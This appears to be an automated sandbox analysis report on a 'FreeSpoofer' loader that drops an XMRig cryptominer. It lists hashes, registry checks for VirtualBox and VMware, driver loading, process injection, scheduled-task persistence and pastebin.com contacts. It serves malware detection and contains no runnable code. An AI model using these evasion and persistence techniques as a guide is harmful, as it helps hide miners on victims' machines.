Analysis
max time kernel: 149s
max time network: 137s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 18-11-2024 17:48
Static task: static1
Behavioral task: behavioral1
  Sample: FreeSpoofer/Loader.exe
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: FreeSpoofer/Loader.exe
  Resource: win10v2004-20241007-en
General
Target: FreeSpoofer/Loader.exe
Size: 26.4MB
MD5: aec49804a232eb45a7cf41e2dfef37fc
SHA1: 5cedbd522c3c40305f6d656f57edf9b6a89d7e21
SHA256: deb7985a8f9a56f2dcbfdd4c5fa4732daad89ce82733818915f3a4e07c2d3b09
SHA512: ad9cf94db9a109e0f3a191169025c4f5ec86aca68937c373380dcb84c728b5817bf5e7bee8eea47b7cb82f5415234ab08a53f26030a5573d574477571f3a3d3d
SSDEEP: 786432:pfjx8ZSLqcnnTNPefii+ydGI5mM3y9nEDQ:pfadJy9nQQ
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
description | pid | Process | procid_target
PID 2944 created 1228 | 2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe | 21
PID 2944 created 1228 | 2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe | 21
PID 2944 created 1228 | 2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe | 21
PID 2944 created 1228 | 2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe | 21
PID 2940 created 1228 | 2940 | ChromeUpdater.exe | 21
PID 2940 created 1228 | 2940 | ChromeUpdater.exe | 21
PID 2940 created 1228 | 2940 | ChromeUpdater.exe | 21
PID 2940 created 1228 | 2940 | ChromeUpdater.exe | 21
PID 988 created 1228 | 988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe | 21
PID 988 created 1228 | 988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe | 21
PID 988 created 1228 | 988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe | 21
PID 988 created 1228 | 988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe | 21
PID 2388 created 1228 | 2388 | ChromeUpdater.exe | 21
PID 2388 created 1228 | 2388 | ChromeUpdater.exe | 21

Xmrig family

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | Loader.exe

XMRig Miner payload 10 IoCs
resource | yara_rule
behavioral1/memory/2940-98-0x000000013F310000-0x000000013FCDA000-memory.dmp | xmrig
behavioral1/memory/2504-101-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2504-154-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2504-174-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2504-177-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2388-181-0x000000013F2F0000-0x000000013FCBA000-memory.dmp | xmrig
behavioral1/memory/2504-183-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2504-185-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2504-187-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
behavioral1/memory/2504-189-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig

pid | Process
408 | powershell.exe
352 | powershell.exe
1068 | powershell.exe
1032 | powershell.exe
1128 | powershell.exe
2164 | powershell.exe
768 | powershell.exe
1604 | powershell.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools | Loader.exe

Sets service image path in registry 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PbUvSWNrIwxxFLXJuZywfXYMy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\PbUvSWNrIwxxFLXJuZywfXYMy" | HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\pDUelUFAAewgvNjRtPLTEfnRf\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\pDUelUFAAewgvNjRtPLTEfnRf" | ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Loader.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Loader.exe

Executes dropped EXE 8 IoCs
pid | Process
2812 | HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2940 | ChromeUpdater.exe
2360 | ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe
2752 | JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
2388 | ChromeUpdater.exe

Loads dropped DLL 6 IoCs
pid | Process
2288 | Loader.exe
2288 | Loader.exe
2380 | taskeng.exe
2288 | Loader.exe
2288 | Loader.exe
2380 | taskeng.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
5 | pastebin.com
4 | pastebin.com

Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | Loader.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | Loader.exe

Drops file in System32 directory 8 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2940 set thread context of 2204 | 2940 | ChromeUpdater.exe | 82
PID 2940 set thread context of 2504 | 2940 | ChromeUpdater.exe | 83

Drops file in Program Files directory 4 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\ChromeUpdater.exe | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
File created | C:\Program Files\Google\Libs\WR64.sys | ChromeUpdater.exe
File created | C:\Program Files\Google\Chrome\ChromeUpdater.exe | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
File created | C:\Program Files\Google\Libs\WR64.sys | ChromeUpdater.exe

Drops file in Windows directory 21 IoCs
description | ioc | Process
File created | C:\Windows\SoftwareDistribution\Download\rpoaJiPszTLYVVQHoRiWVwggluplmB.exe | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\peaUnwdJDqfYGxrvLIkmwIqSvJHpPs.sys | Loader.exe
File opened for modification | C:\Windows\SoftwareDistribution\Download\sOhfCGaIrLanSyRtAcyZkbGaEHckXF.sys | Loader.exe
File created | C:\Windows\Cursors\ZNGvOeeUcshXyEMmfBmjqjqZbSGjyy.sys | Loader.exe
File opened for modification | C:\Windows\Cursors\ZNGvOeeUcshXyEMmfBmjqjqZbSGjyy.sys | Loader.exe
File opened for modification | C:\Windows\Cursors\VeoAqujPmHyNxdVPsglXimurRayeaS.sys | Loader.exe
File created | C:\Windows\Cursors\nquwFtVpDrjedKLcPWlTSybvVrmwMb.exe | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\AKWKfcGgsOMdkETlGXYaJPQgYsbNqN.sys | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\lmPSqyuhFhCTtppmzwJiYUsDQWRnbg.sys | Loader.exe
File opened for modification | C:\Windows\SoftwareDistribution\Download\rpoaJiPszTLYVVQHoRiWVwggluplmB.exe | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\txtyxhSjWBvKFTRDQhpTORfnOyjOCp.exe | Loader.exe
File opened for modification | C:\Windows\SoftwareDistribution\Download\txtyxhSjWBvKFTRDQhpTORfnOyjOCp.exe | Loader.exe
File created | C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe | Loader.exe
File opened for modification | C:\Windows\SoftwareDistribution\Download\peaUnwdJDqfYGxrvLIkmwIqSvJHpPs.sys | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\tKNZaebxAJeZcodKcXiYvQOzEkfoFm.sys | Loader.exe
File opened for modification | C:\Windows\SoftwareDistribution\Download\tKNZaebxAJeZcodKcXiYvQOzEkfoFm.sys | Loader.exe
File created | C:\Windows\SoftwareDistribution\Download\sOhfCGaIrLanSyRtAcyZkbGaEHckXF.sys | Loader.exe
File created | C:\Windows\Cursors\VeoAqujPmHyNxdVPsglXimurRayeaS.sys | Loader.exe
File opened for modification | C:\Windows\Cursors\nquwFtVpDrjedKLcPWlTSybvVrmwMb.exe | Loader.exe
File opened for modification | C:\Windows\SoftwareDistribution\Download\AKWKfcGgsOMdkETlGXYaJPQgYsbNqN.sys | Loader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe

Enumerates system info in registry 2 TTPs 38 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 | reg.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 | reg.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "4841653-05866bce-A" | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data | reg.exe
Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 | reg.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 | reg.exe
Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 | reg.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 | reg.exe
Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "9613114-8d2abece-A" | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 | reg.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 | reg.exe

Modifies data under HKEY_USERS 2 IoCs
description | ioc | Process
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f06e9643e239db01 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2964 | schtasks.exe
2224 | schtasks.exe
1808 | schtasks.exe
1608 | schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2288 | Loader.exe
2288 | Loader.exe
2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2164 | powershell.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
408 | powershell.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944 | FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2940 | ChromeUpdater.exe
2940 | ChromeUpdater.exe
768 | powershell.exe
2940 | ChromeUpdater.exe
2940 | ChromeUpdater.exe
352 | powershell.exe
2940 | ChromeUpdater.exe
2940 | ChromeUpdater.exe
2940 | ChromeUpdater.exe
2940 | ChromeUpdater.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2288 | Loader.exe
2504 | explorer.exe
2752 | JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
2504 | explorer.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
1604 | powershell.exe
2504 | explorer.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
1068 | powershell.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988 | UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
2504 | explorer.exe

Suspicious behavior: LoadsDriver 2 IoCs
pid | Process
2812 | HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
2360 | ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2288 | Loader.exe
Token: SeLoadDriverPrivilege | 2812 | HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
Token: SeDebugPrivilege | 2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
Token: SeDebugPrivilege | 2164 | powershell.exe
Token: SeDebugPrivilege | 408 | powershell.exe
Token: SeDebugPrivilege | 768 | powershell.exe
Token: SeDebugPrivilege | 352 | powershell.exe
Token: SeLockMemoryPrivilege | 2504 | explorer.exe
Token: SeLoadDriverPrivilege | 2360 | ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe
Token: SeDebugPrivilege | 2752 | JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
Token: SeDebugPrivilege | 1604 | powershell.exe
Token: SeDebugPrivilege | 1068 | powershell.exe
Token: SeDebugPrivilege | 1128 | powershell.exe
Token: SeDebugPrivilege | 1032 | powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
2288 | Loader.exe

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2288 wrote to memory of 2812 | 2288 | Loader.exe | 32
PID 2288 wrote to memory of 2812 | 2288 | Loader.exe | 32
PID 2288 wrote to memory of 2812 | 2288 | Loader.exe | 32
PID 2288 wrote to memory of 2600 | 2288 | Loader.exe | 35
PID 2288 wrote to memory of 2600 | 2288 | Loader.exe | 35
PID 2288 wrote to memory of 2600 | 2288 | Loader.exe | 35
PID 2288 wrote to memory of 2600 | 2288 | Loader.exe | 35
PID 2600 wrote to memory of 2840 | 2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe | 37
PID 2600 wrote to memory of 2840 | 2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe | 37
PID 2600 wrote to memory of 2840 | 2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe | 37
PID 2600 wrote to memory of 2840 | 2600 | eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe | 37
PID 2840 wrote to memory of 2020 | 2840 | cmd.exe | 39
PID 2840 wrote to memory of 2020 | 2840 | cmd.exe | 39
PID 2840 wrote to memory of 2020 | 2840 | cmd.exe | 39
PID 2840 wrote to memory of 2020 | 2840 | cmd.exe | 39
PID 2840 wrote to memory of 1468 | 2840 | cmd.exe | 40
PID 2840 wrote to memory of 1468 | 2840 | cmd.exe | 40
PID 2840 wrote to memory of 1468 | 2840 | cmd.exe | 40
PID 2840 wrote to memory of 1468 | 2840 | cmd.exe | 40
PID 2840 wrote to memory of 320 | 2840 | cmd.exe | 41
PID 2840 wrote to memory of 320 | 2840 | cmd.exe | 41
PID 2840 wrote to memory of 320 | 2840 | cmd.exe | 41
PID 2840 wrote to memory of 320 | 2840 | cmd.exe | 41
PID 2840 wrote to memory of 1724 | 2840 | cmd.exe | 42
PID 2840 wrote to memory of 1724 | 2840 | cmd.exe | 42
PID 2840 wrote to memory of 1724 | 2840 | cmd.exe | 42
PID 2840 wrote to memory of 1724 | 2840 | cmd.exe | 42
PID 2840 wrote to memory of 2284 | 2840 | cmd.exe | 43
PID 2840 wrote to memory of 2284 | 2840 | cmd.exe | 43
PID 2840 wrote to memory of 2284 | 2840 | cmd.exe | 43
PID 2840 wrote to memory of 2284 | 2840 | cmd.exe | 43
PID 2840 wrote to memory of 1660 | 2840 | cmd.exe | 44
PID 2840 wrote to memory of 1660 | 2840 | cmd.exe | 44
PID 2840 wrote to memory of 1660 | 2840 | cmd.exe | 44
PID 2840 wrote to memory of 1660 | 2840 | cmd.exe | 44
PID 2840 wrote to memory of 1912 | 2840 | cmd.exe | 45
PID 2840 wrote to memory of 1912 | 2840 | cmd.exe | 45
PID 2840 wrote to memory of 1912 | 2840 | cmd.exe | 45
PID 2840 wrote to memory of 1912 | 2840 | cmd.exe | 45
PID 2840 wrote to memory of 1900 | 2840 | cmd.exe | 46
PID 2840 wrote to memory of 1900 | 2840 | cmd.exe | 46
PID 2840 wrote to memory of 1900 | 2840 | cmd.exe | 46
PID 2840 wrote to memory of 1900 | 2840 | cmd.exe | 46
PID 2840 wrote to memory of 1824 | 2840 | cmd.exe | 47
PID 2840 wrote to memory of 1824 | 2840 | cmd.exe | 47
PID 2840 wrote to memory of 1824 | 2840 | cmd.exe | 47
